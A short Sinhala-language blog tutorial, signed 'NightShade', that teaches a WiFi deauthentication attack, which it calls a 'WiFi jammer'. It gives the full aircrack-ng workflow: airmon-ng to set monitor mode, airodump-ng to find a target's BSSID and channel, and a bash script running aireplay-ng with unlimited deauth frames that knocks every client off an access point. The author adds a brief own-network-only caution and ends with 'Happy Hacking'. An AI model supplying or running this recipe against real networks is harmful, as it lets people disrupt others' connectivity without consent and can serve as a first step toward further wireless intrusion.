WIFI Deauthentication Attack
හරි එහෙනම්, අද කට්ටියට කියල දෙන්න යන්නෙ Wifi Jammer එකක් හදන හැටි. මුලින්ම කියන්න ඕනෙ මේක තමන්ගෙ network එකේ විතරක් අත්හදා බලන්න කියල. මොකද මේක ඉක්මනටම detect කරන්න පුලුවන් දන්න කෙනෙක්ට.
Wifi jammer කිව්වට ඇත්තටම මේක Wifi deauthentication attack එකක්. මේකෙන් වෙන්නෙ මොකක් හරි wifi network එකකට connect වෙලා ඉන්න හැමෝවම disconnect කරන එක.
හරි මුලින්ම අපි කරන්න ඕනෙ අපිට ඕනෙ router එකේ BSSID කියන එකයි ඒකෙ channel number එකයි හොයා ගන්න එක. මේක කරන්න මුලින්ම අපේ network card එක monitor mode එකට දාන්න ඕනෙ.
airmon-ng start wlan0
දැන් අපිට ඕනෙ තොරතුරු හොයාගන්න අපි airodump කියන එක පාවිච්චි කරනව.
airodump-ng wlan0mon
දැන් ඔයාට බලාගන්න පුලුවන් ඔයාගෙ අවට තියෙන wifi access point වල නම් එක්ක තොරතුරු ටිකක් වැටෙනව. ඔයාට ඕනෙ wifi AP එකේ BSSID එකයි channel number එකයි copy කරගන්න එක. පස්සෙ monitor mode එක off කරන්න.
airmon-ng stop wlan0mon
ඒ ඔක්කොම කරා නම් දැන් තියෙන්නෙ අපේ bash script එක ලියන්න තමයි. ඔයා කැමතිම text editor එක open කරගන්න.
nano wifideauth.sh
(මම නම් කැමති vim කියන එකට ඒත් අපේ පහසුවට මම nano කියන එක පාවිච්චි කරනව.)
දැන් ඒ open කරගත්ත file එකේ මෙන්න මේ කෝඩ් ටික ටයිප් කරන්න.
#!/bin/bash
airmon-ng start wlan0 11
aireplay-ng --deauth 0 -a BSSID wlan0mon
මෙතන මම 11 කියල දාල තියෙන තැනට channel number එකයි
BSSID කියන තැනට AP එකේ bssid එකයි දාන්න ඕනෙ.
දැන් ඉතින් මේක save කරගෙන permission දීල run කරන්න තියෙන්නෙ.
chmod +x wifideauth.sh
./wifideauth.sh
දැන් ඉතින් මේ wifi AP එකට connect වෙච්ච හැම එකක්ම ඒකෙන් disconnect වෙයි.
ඊලග පාඩමේදි මේ වගේ attack එකක් detect කරන හැටි කියල දෙන්නම්.
Happy Hacking...
Lesson By :
NightShade - SLPS $ BF Admin

Comments
Post a Comment